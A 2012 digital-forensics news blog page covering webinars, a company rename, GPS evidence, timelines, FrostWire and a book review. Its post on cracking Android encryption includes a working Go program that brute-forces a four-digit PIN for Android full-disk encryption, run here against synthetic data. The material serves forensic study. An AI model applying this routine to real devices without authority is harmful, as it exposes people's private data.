Sincere apologies to anyone having difficulty connecting to the
Meetingburner service to view the Windows 8 Forensics presentation -
please try the following URL on YouTube instead:
http://youtu.be/uhCooEz9FQs
Josh is available in the webinars forum to answer any questions. Please go here if you would like to join in the discussion.
Additionally, a PDF with slides from the presentation can be downloaded here.
I will get these gremlins out of the system soon, I promise!
Jamie
Wednesday, August 29, 2012
Tuesday, August 28, 2012
JADsoftware - The Company Behind IEF - Re-Launches As Magnet Forensics Inc.
JADsoftware, the company behind the industry-leading digital forensics
product Internet Evidence Finder (IEF), announced on Monday that they
have re-launched the company under a new name - Magnet Forensics Inc.
“A lot has changed since I launched JADsoftware and first developed IEF while working as a police officer and forensic examiner,” said Jad Saliba, Founder and Chief Technology Officer of Magnet Forensics.
“After a couple years juggling both jobs, I realized that IEF had tremendous potential to help forensics professionals perform better investigations, so I decided to dedicate myself to developing the software full-time,” Saliba explained. “We now have a team of talented individuals who are working around the clock to take IEF to the next level. The time felt right to transition to a name that better reflects what we do, which is help our customers get to key Internet evidence as quickly and easily as possible, among a proliferation of online data.”
Read more
Monday, August 27, 2012
Computer Analysts and Experts – Making the Most of GPS Evidence
by Professor David Last
The many companies that sell software for computer forensics have developed products for analysing satellite navigators. Police high tech crime units and independent laboratories now use this software on an industrial scale. Computer technicians conduct the analyses. This is home territory for them, since the biggest component of a vehicle satellite navigator is a computer, often running the Linux operating system, and with access via a USB connection or an SD card. The analysis software extracts addresses which it plots using tools such as Google Maps. Specialists extract similar data from satnavs built into vehicles.
But many investigating officers find the results disappointing: “it’s just a list of addresses!” Unlike CCTV, ANPR and witness evidence, there are rarely times or dates to fit into a chronology. And anyway, the addresses are simply destinations for planning routes. The defence will point out that no-one can say who entered them, or at what time on what date, or whether a route was planned to them, or whether the satnav ever went there, let alone in a specific vehicle driven by their client!
Another problem is that the investigating officer may simply not be able to understand the data provided. What are all these addresses? Were they recorded by the device itself or input by a user? Was that inputting an intentional action? The sense of frustration is enhanced by the quality of reports generated by much commercial software. The best packages provide at least some explanation of the data they contain, the worst none at all. The technicians who conduct the analyses often have neither the time nor the training to help. This leaves the officer with the prospect of presenting and defending poorly understood data in court. Some just give up!
But the addresses may at least have intelligence value...
Read more
Friday, August 24, 2012
Generating computer forensic supertimelines under Linux: A comprehensive guide for Windows-based disk images
When the authors first published this paper, their intentions were to
develop a comprehensive guide to digital forensic timelines in order to
consolidate the many fragmented sources of information concerning this
topic. What they discovered, however, was that quality references were
often challenging to find among various books, papers, periodicals,
filesystem specifications and source code.
While conducting their research, they found that practical tool-based solutions existed for generating digital forensic timelines, though they each had specific limitations. Thus, efforts were undertaken by the authors to provide an alternative timeline generation framework. Although some in the community had already proposed the use and generation of supertimelines, all too often important data sources were being left out. In order to rectify this, it became necessary to couple additional tools in order to provide maximum evidentiary extraction...
Read more
Wednesday, August 22, 2012
Webinar: Windows 8 Forensics - A First Look
Take a first look at Windows 8 forensics in a webinar presented by Josh
Brunty, Assistant Professor of Digital Forensics at Marshall University.
Learn about the changes in Windows 8 which forensic examiners should be
aware of before this new OS is released to the public in October. After
the webinar Josh will be available in the Forensic Focus forums to
answer any questions.
Date: Wednesday, August 29 2012
Time: 11AM EDT US / 4PM BST UK / 15:00 GMT
Duration: 35 mins
Register today at http://forensicfocus.enterthemeeting.com/m/JXI8IWVX
Please share this invitation with any friends or colleagues who might also be interested, thank you.
Friday, August 17, 2012
Apple phones are AES-tough, says forensics expert
Monday's Technology Review carries a glowing tribute to Apple iPhone security by Simson Garfinkel, a contributing editor who works in computer forensics and is highly regarded as a leader in the field. He says Apple has passed a threshold: “Today the Apple iPhone 4S and iPad 3 are trustworthy mobile computing systems that can be used for mobile payments, e-commerce, and the delivery of high-quality paid programming,” thanks to Apple’s heavy investment in iPhone security. That is where “threshold” comes in: Apple has crossed it. Even law enforcement cannot perform forensic examinations of Apple devices seized from criminals, he said...
Read more (Phys.org)
Thursday, August 16, 2012
Researchers Show How to Crack Android Encryption
As forensic examiners, some of the last things we want to hear are "encryption" and "enabled" in the same sentence; however, that is exactly what has been happening with the current line of Android devices. Starting with Android 3.0, devices have shipped with the ability for the user to enable full device encryption. Fortunately for the forensic community, there are individuals determined to find a way to break that encryption, and they have already shown how. Two such researchers, Thomas Cannon and Seyton Bradford, have demonstrated successful brute-force attacks against Android encryption. Thomas detailed their findings at DEF CON 2012 in his presentation "Into the Droid - Gaining Access to User Data"...
He explains that the encryption uses standard Linux dm-crypt, incorporated in Android devices running version 3.0 and newer, and that the same password used to unlock or log in to the device is also the password that protects the encrypted data. So while the cipher itself is generally considered strong, users default to short or easy-to-type passwords and PINs to protect their device, and that same weak secret is all that stands in front of the encryption...
Read more
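The brute force described above can be reproduced offline against a constructed image. The Go program below is an added example and is not code from the DEF CON talk or from this post. It assumes the Android 3.x/4.x cryptfs layout, which the post does not spell out: the unlock PIN is stretched with PBKDF2-HMAC-SHA1 (2000 rounds, 16-byte salt) into an AES-128-CBC key and IV that wrap the 16-byte dm-crypt master key, and the userdata partition is encrypted in aes-cbc-essiv:sha256 mode over 512-byte sectors. The salt, wrapped key, master key and encrypted sector are all fabricated by buildSample rather than read from a real crypto footer, and the oracle for a correct guess is the ext4 superblock magic that appears in sector 2 once the right key is used.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/sha1"
	"crypto/sha256"
	"encoding/binary"
	"fmt"
)

// Parameters assumed from the Android 3.x/4.x cryptfs design (not stated on this page).
const pbkdfRounds = 2000

// pbkdf2SHA1 is a minimal PBKDF2 (RFC 2898) with HMAC-SHA1, so no external module is needed.
func pbkdf2SHA1(password, salt []byte, rounds, keyLen int) []byte {
	var out []byte
	for block := uint32(1); len(out) < keyLen; block++ {
		var be [4]byte
		binary.BigEndian.PutUint32(be[:], block)
		mac := hmac.New(sha1.New, password)
		mac.Write(salt)
		mac.Write(be[:])
		u := mac.Sum(nil)
		t := append([]byte(nil), u...)
		for i := 1; i < rounds; i++ {
			mac = hmac.New(sha1.New, password)
			mac.Write(u)
			u = mac.Sum(nil)
			for j := range t {
				t[j] ^= u[j]
			}
		}
		out = append(out, t...)
	}
	return out[:keyLen]
}

// unwrapMasterKey stretches a PIN candidate into key+IV and CBC-decrypts the wrapped master key.
func unwrapMasterKey(pin string, salt, wrapped []byte) []byte {
	kiv := pbkdf2SHA1([]byte(pin), salt, pbkdfRounds, 32)
	blk, _ := aes.NewCipher(kiv[:16])
	mk := make([]byte, len(wrapped))
	cipher.NewCBCDecrypter(blk, kiv[16:]).CryptBlocks(mk, wrapped)
	return mk
}

// essivIV computes the dm-crypt ESSIV: AES keyed by sha256(key) over the little-endian sector number.
func essivIV(masterKey []byte, sector uint64) []byte {
	h := sha256.Sum256(masterKey)
	blk, _ := aes.NewCipher(h[:])
	var sec, iv [16]byte
	binary.LittleEndian.PutUint64(sec[:8], sector)
	blk.Encrypt(iv[:], sec[:])
	return iv[:]
}

// cbcSector encrypts or decrypts one sector the way dm-crypt aes-cbc-essiv:sha256 does.
func cbcSector(masterKey, in []byte, sector uint64, encrypt bool) []byte {
	blk, _ := aes.NewCipher(masterKey)
	iv := essivIV(masterKey, sector)
	mode := cipher.NewCBCDecrypter(blk, iv)
	if encrypt {
		mode = cipher.NewCBCEncrypter(blk, iv)
	}
	out := make([]byte, len(in))
	mode.CryptBlocks(out, in)
	return out
}

// looksLikeExt4 is the oracle: the ext4 superblock sits at byte 1024 (sector 2) with magic
// 0xEF53 at offset 0x38 and a small s_log_block_size at 0x18. Checking both fields keeps the
// chance that a wrong key passes far below the 1/65536 a bare magic check would give.
func looksLikeExt4(sb []byte) bool {
	return binary.LittleEndian.Uint16(sb[0x38:]) == 0xEF53 &&
		binary.LittleEndian.Uint32(sb[0x18:]) <= 6
}

// bruteForcePIN walks the 4-digit PIN space and returns the PIN whose unwrapped
// master key decrypts sector 2 into a plausible ext4 superblock.
func bruteForcePIN(salt, wrapped, sector2 []byte) (string, []byte, bool) {
	for n := 0; n < 10000; n++ {
		pin := fmt.Sprintf("%04d", n)
		mk := unwrapMasterKey(pin, salt, wrapped)
		if looksLikeExt4(cbcSector(mk, sector2, 2, false)) {
			return pin, mk, true
		}
	}
	return "", nil, false
}

// buildSample constructs a synthetic wrapped key and encrypted sector 2 the way cryptfs
// would have written them (constructed data, not taken from any real device).
func buildSample(pin string, masterKey, salt []byte) (wrapped, sector2 []byte) {
	kiv := pbkdf2SHA1([]byte(pin), salt, pbkdfRounds, 32)
	blk, _ := aes.NewCipher(kiv[:16])
	wrapped = make([]byte, len(masterKey))
	cipher.NewCBCEncrypter(blk, kiv[16:]).CryptBlocks(wrapped, masterKey)
	plain := make([]byte, 512)
	binary.LittleEndian.PutUint32(plain[0x18:], 2)      // s_log_block_size: 4 KiB blocks
	binary.LittleEndian.PutUint16(plain[0x38:], 0xEF53) // s_magic
	return wrapped, cbcSector(masterKey, plain, 2, true)
}

func main() {
	masterKey := []byte("0123456789abcdef") // constructed 16-byte AES-128 master key
	salt := []byte("saltsaltsaltsalt")      // constructed 16-byte salt
	wrapped, sector2 := buildSample("0314", masterKey, salt)
	pin, mk, ok := bruteForcePIN(salt, wrapped, sector2)
	fmt.Printf("found=%v pin=%s masterKey=%x\n", ok, pin, mk)
}
```

With a four-digit PIN the whole space is 10,000 guesses, and at 2,000 PBKDF2 rounds each that is seconds of work on a laptop once the salt, the wrapped key and a single sector have been imaged. The cost scales with the size of the PIN space, not with the strength of AES, which is exactly the point the post makes: a long passphrase makes the same loop infeasible, a four-digit PIN does not. On a real device the salt and wrapped key would be read from the crypto footer rather than built by buildSample, a detail this page does not cover.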
Friday, August 10, 2012
Forensic Examination of FrostWire version 5
As digital forensic practitioners, we regularly encounter users who use the internet to swap and download copyrighted and contraband material. Peer-to-peer (P2P) applications are commonly used for this purpose, and like any software application, they are ever changing and ever evolving. This paper discusses how the P2P application FrostWire v.5 functions and what artifacts can be found and examined for forensic purposes. It is one of the more popular P2P applications...
Read more
Wednesday, August 01, 2012
Book Review: Mastering Windows Network Forensics & Investigations
by Chad Tilbury
Mastering Windows Network Forensics and Investigations fills an interesting niche not well addressed in the pantheon of digital forensics resources. The material is well suited for beginning and intermediate forensic examiners looking to better understand network artifacts and go beyond single-system forensics. I highly recommend it for system administrators looking for a different perspective on network security or those interested in designing networks to be forensics-friendly. That said, the topics covered do not fit within the classical definition of network forensics. A more apt title might be Mastering Incident Response Forensics and Investigations.
This is the first book I have read in the Sybex Mastering series, and I was impressed with the writing, research, and editing. The authors blended dense material with relevant examples and insightful and engaging text boxes. Some of my favorite “side” topics were:
- “Cross-platform Forensic Artifacts”
- “Registry Research”, illustrating the use of Procmon for application footprinting
- “Time is of the Essence”, explaining fast forensics using event logs and the registry
Read more